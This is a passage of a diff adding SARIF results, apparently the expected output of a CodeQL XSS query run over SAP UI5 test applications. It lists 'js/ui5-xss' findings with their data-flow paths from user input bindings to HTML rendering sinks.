"%SRCROOT%", + "index" : 289 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 27, + "startColumn" : 36, + "endColumn" : 41 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "8ceecee7055f4fa2:1", + "primaryLocationStartColumnFingerprint" : "23" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 26, + "startColumn" : 25, + "endColumn" : 42 + } + }, + "message" : { + "text" : "oInput.getValue()" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 26, + "startColumn" : 17, + "endColumn" : 42 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 27, + "startColumn" : 36, + "endColumn" : 41 + } + }, + "message" : { + "text" : "value" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 26, + "startColumn" : 25, + "endColumn" : 42 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 361 + }, + "region" : { + "startLine" : 8, + "startColumn" : 28, + "endColumn" : 46 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "353ad97f4bff4eae:1", + "primaryLocationStartColumnFingerprint" : "15" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 367 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 363 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js", + "uriBaseId" : "%SRCROOT%", + "index" : 360 + }, + "region" : { + "startLine" : 5, + "startColumn" : 15, + "endColumn" : 33 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 361 + }, + "region" : { + "startLine" : 8, + "startColumn" : 28, + "endColumn" : 46 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 367 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 387 + }, + "region" : { + "startLine" : 8, + "startColumn" : 28, + "endColumn" : 46 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "353ad97f4bff4eae:1", + "primaryLocationStartColumnFingerprint" : "15" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 393 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 389 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 388 + }, + "region" : { + "startLine" : 7, + "startColumn" : 23, + "endColumn" : 41 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 387 + }, + "region" : { + "startLine" : 8, + "startColumn" : 28, + "endColumn" : 46 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 393 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 398 + }, + "region" : { + "startLine" : 8, + "startColumn" : 28, + "endColumn" : 46 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "353ad97f4bff4eae:1", + "primaryLocationStartColumnFingerprint" : "15" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 403 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 399 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 396 + }, + "region" : { + "startLine" : 7, + "startColumn" : 23, + "endColumn" : 41 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 398 + }, + "region" : { + "startLine" : 8, + "startColumn" : 28, + "endColumn" : 46 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 403 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", + "uriBaseId" : "%SRCROOT%", + "index" : 375 + }, + "region" : { + "startLine" : 21, + "startColumn" : 22, + "endColumn" : 32 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "5d5122f6c75b5d01:1", + "primaryLocationStartColumnFingerprint" : "9" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", + "uriBaseId" : "%SRCROOT%", + "index" : 375 + }, + "region" : { + "startLine" : 18, + "startColumn" : 20, + "endColumn" : 30 + } + }, + "message" : { + "text" : "/input" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 371 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", + "uriBaseId" : "%SRCROOT%", + "index" : 375 + }, + "region" : { + "startLine" : 21, + "startColumn" : 22, + "endColumn" : 32 + } + }, + "message" : { + "text" : "/input" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", + "uriBaseId" : "%SRCROOT%", + "index" : 375 + }, + "region" : { + "startLine" : 18, + "startColumn" : 20, + "endColumn" : 30 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", + "uriBaseId" : "%SRCROOT%", + "index" : 382 + }, + "region" : { + "startLine" : 13, + "startColumn" : 15, + "endColumn" : 25 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "c18df3aa119b40dc:1", + "primaryLocationStartColumnFingerprint" : "11" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", + "uriBaseId" : "%SRCROOT%", + "index" : 382 + }, + "region" : { + "startLine" : 9, + "startColumn" : 13, + "endColumn" : 23 + } + }, + "message" : { + "text" : "\"value\": \"{/input}\"" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 379 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", + "uriBaseId" : "%SRCROOT%", + "index" : 382 + }, + "region" : { + "startLine" : 13, + "startColumn" : 15, + "endColumn" : 25 + } + }, + "message" : { + "text" : "\"content\": \"{/input}\"" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", + "uriBaseId" : "%SRCROOT%", + "index" : 382 + }, + "region" : { + "startLine" : 9, + "startColumn" : 13, + "endColumn" : 23 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 166 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endColumn" : 50 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "74b35e217af6aa05:1", + "primaryLocationStartColumnFingerprint" : "0" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 166 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 163 + }, + "region" : { + "startLine" : 10, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 166 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endColumn" : 50 + } + }, + "message" : { + "text" : "content={/input}" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 166 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 315 + }, + "region" : { + "startLine" : 9, + "startColumn" : 5, + "endColumn" : 40 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "9caa0f252fbe2993:1", + "primaryLocationStartColumnFingerprint" : "0" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 315 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 31, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 9, + "startColumn" : 25, + "endColumn" : 53 + } + }, + "message" : { + "text" : "oModel. ... input')" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 53 + } + }, + "message" : { + "text" : "input" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 10, + "startColumn" : 44, + "endColumn" : 49 + } + }, + "message" : { + "text" : "input" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 32, + "startColumn" : 17, + "endColumn" : 30 + } + }, + "message" : { + "text" : "output1: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 315 + }, + "region" : { + "startLine" : 9, + "startColumn" : 5, + "endColumn" : 40 + } + }, + "message" : { + "text" : "content={/output1}" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 315 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 315 + }, + "region" : { + "startLine" : 17, + "startColumn" : 5, + "endColumn" : 40 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "2963bbd458e69924:1", + "primaryLocationStartColumnFingerprint" : "0" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 18, + "startColumn" : 31, + "endColumn" : 60 + } + }, + "message" : { + "text" : "oEvent. ... Value()" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 18, + "startColumn" : 17, + "endColumn" : 60 + } + }, + "message" : { + "text" : "sInputValue" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 19, + "startColumn" : 44, + "endColumn" : 55 + } + }, + "message" : { + "text" : "sInputValue" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 34, + "startColumn" : 17, + "endColumn" : 30 + } + }, + "message" : { + "text" : "output3: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 315 + }, + "region" : { + "startLine" : 17, + "startColumn" : 5, + "endColumn" : 40 + } + }, + "message" : { + "text" : "content={/output3}" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 18, + "startColumn" : 31, + "endColumn" : 60 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 323 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endColumn" : 37 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "97b29ed20ac04ff0:1", + "primaryLocationStartColumnFingerprint" : "0" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 323 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 319 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 323 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endColumn" : 37 + } + }, + "message" : { + "text" : "content={/input}" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 323 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 331 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endColumn" : 38 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "1406455ac263a2d9:1", + "primaryLocationStartColumnFingerprint" : "0" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 331 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 327 + }, + "region" : { + "startLine" : 12, + "startColumn" : 26, + "endColumn" : 46 + } + }, + "message" : { + "text" : "new JSONModel(oData)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 331 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endColumn" : 38 + } + }, + "message" : { + "text" : "content={/output}" + } + } + } ] + } ] + }, { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 331 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 327 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 327 + }, + "region" : { + "startLine" : 15, + "startColumn" : 25, + "endColumn" : 53 + } + }, + "message" : { + "text" : "oModel. ... input')" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 327 + }, + "region" : { + "startLine" : 15, + "startColumn" : 17, + "endColumn" : 53 + } + }, + "message" : { + "text" : "input" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 327 + }, + "region" : { + "startLine" : 16, + "startColumn" : 43, + "endColumn" : 48 + } + }, + "message" : { + "text" : "input" + } + } + }, { + "location" : { + 